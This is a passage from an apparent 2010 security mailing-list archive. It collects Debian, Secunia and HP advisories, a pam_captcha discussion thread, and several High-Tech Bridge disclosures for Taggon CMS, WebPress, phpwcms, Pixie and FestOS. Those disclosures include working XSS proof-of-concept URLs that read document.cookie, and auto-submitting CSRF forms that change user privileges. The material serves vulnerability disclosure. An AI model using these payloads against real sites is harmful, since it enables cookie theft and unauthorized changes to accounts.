http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny2_arm.deb
Size/MD5 checksum:   686080 a12f9cb0b5f76071ed204cfdcc571cd5
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny2_arm.deb
Size/MD5 checksum:   356996 ff79207089cce445fa6d0514156f12cf

armel architecture (ARM EABI)

  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny2_armel.deb
Size/MD5 checksum:   684278 7654ae1ba45138f11c53da2acce6055c
  
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny2_armel.deb
Size/MD5 checksum:   210040 2d05fa53273572a89c81c9085a291fee
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny2_armel.udeb
Size/MD5 checksum:   236524 727d731977efad369b51fdc28d42bade
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny2_armel.deb
Size/MD5 checksum:   353412 

XSS vulnerability in Taggon CMS

2010-07-15 Thread advisory
Vulnerability ID: HTB22477
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_taggon_cms.html
Product: Taggon CMS
Vendor: Onison ( http://www.onison.com/articles/3 ) 
Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the slideShow.html script to 
properly sanitize user-supplied input in many variables. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, disclosure or 
modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:


http://host/slideShow.html?company=COMPANYuserid=USERCurrentSlide=1pic=1slideShowMode=1external=1category=_u1234567_inbox%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

http://host/slideShow.html?company=COMPANYuserid=USERCurrentSlide=1pic=1slideShowMode=1external=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ecategory=_u1234567_inbox

http://host/slideShow.html?company=COMPANYuserid=USERCurrentSlide=1pic=1slideShowMode=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Eexternal=1category=_u1234567_inbox

http://host/slideShow.html?company=COMPANYuserid=USERCurrentSlide=1pic=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3EslideShowMode=1external=1category=_u1234567_inbox

http://host/slideShow.html?company=COMPANYuserid=USERCurrentSlide=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Epic=1slideShowMode=1external=1category=_u1234567_inbox

http://host/slideShow.html?company=COMPANY%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Euserid=USERCurrentSlide=1pic=1slideShowMode=1external=1category=_u1234567_inbox





XSS vulnerability in WebPress

2010-07-15 Thread advisory
Vulnerability ID: HTB22481
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_webpress_3.html
Product: WebPress
Vendor: YWP ( http://www.goywp.com/ ) 
Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the 
admin_page_accounts_users_action.php script to properly sanitize 
user-supplied input in id_num_mod variable. Successful exploitation of this 
vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, disclosure or modification of 
sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:


http://host/path/_system/accounts/users/_pages/admin_page_accounts_users_action.php?id_num_mod=xxx%3Cscript%3Ealert%28document.cookie%29%3C/script%3Esubmit_action=Edit






Secunia Research: GIGABYTE Dldrv2 ActiveX Control Unsafe Methods

2010-07-15 Thread Secunia Research
== 

 Secunia Research 15/07/2010

 - GIGABYTE Dldrv2 ActiveX Control Unsafe Methods -

== 
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

== 
1) Affected Software 

* GIGABYTE Dldrv2 ActiveX Control 1.4.206.11

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System compromise
Where:  Remote

== 
3) Vendor's Description of Software 

GIGABYTE's Download Center allows you to quickly download and update 
your BIOS as well as the latest system drivers..

Product Link:
http://download.gigabyte.com.tw/

== 
4) Description of Vulnerability

Secunia Research has discovered some vulnerabilities in GIGABYTE 
Dldrv2 ActiveX Control, which can be exploited by malicious people to 
compromise a user's system.

1) The unsafe method dl() allows automatically downloading and 
executing an arbitrary file.

2) Combined usage of the unsafe methods SetDLInfo() and Bdl() 
allows automatically downloading an arbitrary file to an arbitrary 
location on the user's system.

== 
5) Solution 

Set the kill-bit for the ActiveX control.

== 
6) Time Table 

18/06/2010 - Vendor notified.
29/06/2010 - Vendor response.
15/07/2010 - Public disclosure.

== 
7) Credits 

Discovered by Carsten Eiram, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-1517 for the vulnerabilities.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-85/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


XSS vulnerability in WebPress

2010-07-15 Thread advisory
Vulnerability ID: HTB22480
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_webpress_2.html
Product: WebPress
Vendor: YWP ( http://www.goywp.com/ ) 
Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the 
admin_page_sidemenu_blocks_action.php script to properly sanitize 
user-supplied input in id_num_mod variable. Successful exploitation of this 
vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, disclosure or modification of 
sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:


http://host/path/_system/menus/sidemenu_blocks/_pages/admin_page_sidemenu_blocks_action.php?id_num_mod=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Edcfsubmit_action=Edit






Re: pam_captcha username harvest vulnerability

2010-07-15 Thread Jordan Sissel
On Tue, Jul 6, 2010 at 11:04 AM, Ian Maguire imagu...@superb.net wrote:
 pam_captcha is visual text-based CAPTCHA challenge module for PAM that uses
 figlet to generate the CAPTCHAs.

 Project site:
 http://www.semicomplete.com/projects/pam_captcha/

 A site with a screen shot:
 http://www.michaelboman.org/how-to/securing-ssh-access-with-pam-captcha

 I found a security problem with the pam_captcha. If you enter a username
 that is not a valid user followed by the correct CAPTCHA, you do not get
 prompted for a password. You simply get prompted for another CAPTCHA.
 However, if you enter a username that is a valid user followed by the
 correct CAPTCHA, you will get prompted for a password. This means an
 attacker, or a script/bot could easily harvest a list of valid usernames
 simply by whether or not it prompts for a password after a valid captcha
 entry. I have duplicated this behavior in FreeBSD 8.0 which uses BSD's
 OpenPAM. From what I have seen this module is not compatible with Linux-PAM.

 I don't know enough C Fu to propose a patch. Until it is patched the
 solution is to disable pam_captcha in your pam config file. The creator of
 this module seems to think that using this module isn't really even
 necessary.

 http://www.semicomplete.com/blog/geekery/pam_captcha_research.html


 - ian


I can't reproduce the behavior you describe on FreeBSD 8.0 nor on
Ubuntu 9.10. It seems more likely that what you experience is actually
misconfigured sshd/pam.

With pam_captcha 1.3 on a fresh FreeBSD 8.0-RELEASE and this
/etc/pam.d/sshd config:
authsufficient  pam_opie.so   no_warn no_fake_prompts
authrequisite pam_opieaccess.so no_warn allow_local
auth requisite pam_captcha.so randomstring
#auth   sufficient  pam_krb5.so   no_warn try_first_pass
#auth   sufficient  pam_ssh.sono_warn try_first_pass
authrequired  pam_unix.so   no_warn try_first_pass

My sshd_config has this:
ChallengeResponseAuthentication yes
PasswordAuthentication no
UsePAM yes

What I see: Successful pass of the captcha with an invalid username
results in being given another captcha or an abort (if this is
multiple failures) and PAM logs the fact that there was a failure due
to invalid user.

For example, if you don't disable PasswordAuthentication then pam
failures could (captcha or other failures) will give up after a few
tries and move on to Password auth (no captcha) auth instead.

Are you sure this isn't something misconfigured on your side? Can you
publish your sshd_config and pam configs?

-Jordan


[SECURITY] [DSA 2071-1] New libmikmod packages fix several vulnerabilities

2010-07-15 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-2071-1  secur...@debian.org
http://www.debian.org/security/   Moritz Muehlenhoff
July 14, 2010 http://www.debian.org/security/faq
- 

Package: libmikmod
Vulnerability  : buffer overflows
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)  : CVE-2009-3995 CVE-2009-3996

Dyon Balding discovered buffer overflows in the MikMod sound library, 
which could lead to the execution of arbitrary code if a user is 
tricked into opening malformed Impulse Tracker or Ultratracker sound 
files.

For the stable distribution (lenny), these problems have been fixed in
version 3.1.11-6+lenny1.

For the unstable distribution (sid), these problems have been fixed in
version 3.1.11-6.2.

We recommend that you upgrade your libmikmod packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod_3.1.11-6+lenny1.dsc
Size/MD5 checksum: 1038 9741350a41a54261dbf242f02aa325fd
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod_3.1.11.orig.tar.gz
Size/MD5 checksum:   611590 705106da305e8de191549f1e7393185c
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod_3.1.11-6+lenny1.diff.gz
Size/MD5 checksum:   336630 4e4d04d2c9b5bcdd3edb3b04e683ea86

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_alpha.deb
Size/MD5 checksum:   221696 e01fb2f9c7e693ae7b0727a552da31a1
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_alpha.deb
Size/MD5 checksum:   378570 dd8abb7da4195af53aed1e57750d2f1f

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_amd64.deb
Size/MD5 checksum:   157216 b3836423b8875f21d5ae01d5f9b533c5
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_amd64.deb
Size/MD5 checksum:   265776 935b94d522dd814337b06acd07184fb7

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_arm.deb
Size/MD5 checksum:   164040 f2fdc8c7f4c7f54ec75ffd179c98ddca
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_arm.deb
Size/MD5 checksum:   264064 2eba8b4037ca117fc8920563d2b05ca3

armel architecture (ARM EABI)

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_armel.deb
Size/MD5 checksum:   155766 916c6a467219ed4a5e0da68168c1e591
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_armel.deb
Size/MD5 checksum:   254664 77c56898614f92c30e0ad5ef2de7c0cc

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_hppa.deb
Size/MD5 checksum:   185910 6b044e5ce0fb2de4fc37a8ddbbd037a0
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_hppa.deb
Size/MD5 checksum:   299236 40db7231bf6258319f45412c1d46df50

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_i386.deb
Size/MD5 checksum:   244570 c4363c834307008b053bb1899a13013f
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_i386.deb
Size/MD5 checksum:   147266 3d8adb8a243afb7a614052ba7494e01e

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_ia64.deb
Size/MD5 checksum:   264426 c2d6c1a0d1b32ff27030ec2f1cd3ebe4
  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6+lenny1_ia64.deb
Size/MD5 checksum:   391590 39c904baed7a4462ccbf10805cae88c0

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/libm/libmikmod/libmikmod2_3.1.11-a-6+lenny1_mips.deb
Size/MD5 checksum:   167728 708a04685879d374730d4b94dd87a7d8
  

XSS vulnerability in phpwcms

2010-07-15 Thread advisory
Vulnerability ID: HTB22475
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_phpwcms.html
Product: phpwcms 
Vendor: Oliver Georgi ( http://www.phpwcms.de/ ) 
Vulnerable Version: 1.4.5 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the phpwcms.php script to properly 
sanitize user-supplied input in calendardate variable. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, disclosure or 
modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:


http://host/phpwcms.php?do=modulesmodule=calendarcalendardate=8-2010%22+onmouseover=alert%2834%29+style=position:absolute;width:100%;height:100%;left:0;top:0;+%22

Solution: Upgrade to the most recent version



Stored XSS vulnerability in Pixie

2010-07-15 Thread advisory
Vulnerability ID: HTB22469
Reference: 
http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_pixie.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ ) 
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the Pixie core settings saving 
script to properly sanitize user-supplied input in sysmess variable. 
Successful exploitation of this vulnerability could result in a compromise of 
the application, theft of cookie-based authentication credentials, disclosure 
or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:

form accept-charset=UTF-8 
action=http://host/admin/index.php?s=settingsx=pixie; method=post 
name=main 
input type=hidden name=langu value=en-gb /
input type=hidden name=time_zone value=+0 /
input type=hidden name=dstime value=no /
input type=hidden name=dateformat value=%Oe %B %Y, %H:%M /
input type=hidden name=rte value=1 /
input type=hidden name=logs value=5 /
input type=hidden name=sysmess value='hello 
messagescriptalert(document.cookie)/script' /
input type=submit name=settings_edit id=form_addedit_submit 
value=Update /
/form
script
document.getElementById('form_addedit_submit').click();
/script





[security bulletin] HPSBUX02556 SSRT100014 rev.1 - HP-UX Running rpc.ttdbserver, Remote Execution of Arbitrary Code

2010-07-15 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02288473
Version: 1

HPSBUX02556 SSRT100014 rev.1 - HP-UX Running rpc.ttdbserver, Remote Execution 
of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2010-07-13
Last Updated: 2010-07-13

Potential Security Impact: Remote execution of arbitrary code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running 
rpc.ttdbserver. The vulnerability could be exploited remotely to execute 
arbitrary code.

References: CVE-2010-0083

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running rpc.ttdbserver

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2010-0083(AV:N/AC:M/Au:S/C:C/I:C/A:C)   8.5
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

The vulnerability can be resolved by disabling rtp.ttdbserver.

Note: The rpc.ttdbserver process is not needed for programs provided in the HP 
CDE product.

To Disable rpc.ttdbserver

Edit /etc/inetd.conf and comment out the rpc.ttdbserver line as follows:
#rpc stream tcp swait root /usr/dt/bin/rpc.ttdbserver ...

Restart inetd:
/usr/sbin/inetd -c

Kill any instances of rpc.ttdbserver that might be running.

MANUAL ACTIONS: Yes - NonUpdate
Disable rpc.ttdbserver

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see: https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.11
HP-UX B.11.23
HP-UX B.11.31
==
CDE.CDE-TT
action: disable rpc.ttdbserver

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) 13 July 2010 Initial release
Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.

To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing  Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.

HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for 

XSS vulnerability in Pixie

2010-07-15 Thread advisory
Vulnerability ID: HTB22468
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pixie.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ ) 
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the site settings saving script to 
properly sanitize user-supplied input in keywords variable. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, disclosure or 
modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:

form accept-charset=UTF-8 
action=http://host/admin/index.php?s=settingsx=site; method=post 
name=main 
input type=hidden name=sitename value=Pixie /
input type=hidden name=url value=http://host/; /
input type=hidden name=default value=blog/ /
input type=hidden name=keywords 
value='key1scriptalert(document.cookie)/script' /
input type=hidden name=site_auth value=sute author /
input type=hidden name=site_cright value=copyright /
input type=hidden name=cleanurls value=yes /
input type=submit name=settings_edit id=form_addedit_submit 
value=Update /
/form
script
document.getElementById('form_addedit_submit').click();
/script





[security bulletin] HPSBMA02550 SSRT100170 rev.2 - HP Insight Software Installer for Windows, Local Unauthorized Access to Data, Remote Cross Site Request Forgery (CSRF)

2010-07-15 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02282377
Version: 2

HPSBMA02550 SSRT100170 rev.2 - HP Insight Software Installer for Windows, Local 
Unauthorized Access to Data, Remote Cross Site Request Forgery (CSRF)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2010-07-12
Last Updated: 2010-07-14

Potential Security Impact: Local unauthorized access to data, remote Cross Site 
Request Forgery (CSRF)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Insight 
Software Installer for Windows . The vulnerabilities could be exploited locally 
to allow unauthorized access to data and remotely to allow Cross Site Request 
Forgery (CSRF).

References: CVE-2010-1967 (unauthorized access to data), CVE-2010-1968 (CSRF)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Insight Software Installer for Windows for all versions prior to v6.1

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2010-1967(AV:L/AC:L/Au:S/C:P/I:P/A:N)   3.2
CVE-2010-1968(AV:N/AC:M/Au:N/C:P/I:P/A:P)   6.8
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made an update available to resolve the vulnerabilities. The update can 
be downloaded from 
http://h18000.www1.hp.com/products/servers/management/fpdownload.html

HP Insight Software Installer v6.1 or subsequent

PRODUCT SPECIFIC INFORMATION

None

HISTORY
Version:1 (rev.1) - 12 July 2010 Initial release
Version:2 (rev.2) - 14 July 2010 Corrected CVE number in References section

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.

To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing  Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.

HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for any damages resulting from user's use or disregard of the 
information provided in this Bulletin. To the extent permitted by law, HP 
disclaims all warranties, either express or implied, including the warranties 
of merchantability and fitness for a particular purpose, title and 
non-infringement.

Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial 

XSS vulnerability in FestOS

2010-07-15 Thread advisory
Vulnerability ID: HTB22473
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_festos_1.html
Product: FestOS
Vendor: Skypanther Studios, Inc ( http://festengine.org/ ) 
Vulnerable Version: 2.3b and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the /admin/do_snippets_edit.php 
script to properly sanitize user-supplied input in contents variable. 
Successful exploitation of this vulnerability could result in a compromise of 
the application, theft of cookie-based authentication credentials, disclosure 
or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:

form action=http://host/admin/do_snippets_edit.php?tabname=Pages; 
method=post name=main 
input type=hidden name=snippetID value=1 /
input type=hidden name=title value=Site footer /
input type=hidden name=active value=1 /
input type=hidden name=contents 
value='footerscriptalert(document.cookie)/script' /
/form

script
document.main.submit();
/script





XSRF (CSRF) in Pixie

2010-07-15 Thread advisory
Vulnerability ID: HTB22471
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_pixie_1.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ ) 
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the user privilieges script to 
properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of 
the application, theft of cookie-based authentication credentials, disclosure 
or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is 
available:

form accept-charset=UTF-8 
action=http://host/admin/index.php?s=settingsamp;x=users; method=post 
name=main 
input type=hidden name=uname value=test  /
input type=hidden name=realname value=test name2 /
input type=hidden name=email value=myem...@myemaildomain.com /
input type=submit name=user_edit id=sbmtit value=Update /
input type=hidden name=privilege value=2 /
input type=hidden name=user_id value=2 /

/form
script
document.getElementById('sbmtit').click();
/script





XSS vulnerability in FestOS

2010-07-15 Thread advisory
Vulnerability ID: HTB22472
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_festos.html
Product: FestOS
Vendor: Skypanther Studios, Inc ( http://festengine.org/ ) 
Vulnerable Version: 2.3b and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the /admin/do_pages_edit.php 
script to properly sanitize user-supplied input in title variable. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, disclosure or 
modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:

form action=http://host/admin/do_pages_edit.php; method=post name=main 
input type=hidden name=pageID value=2 /
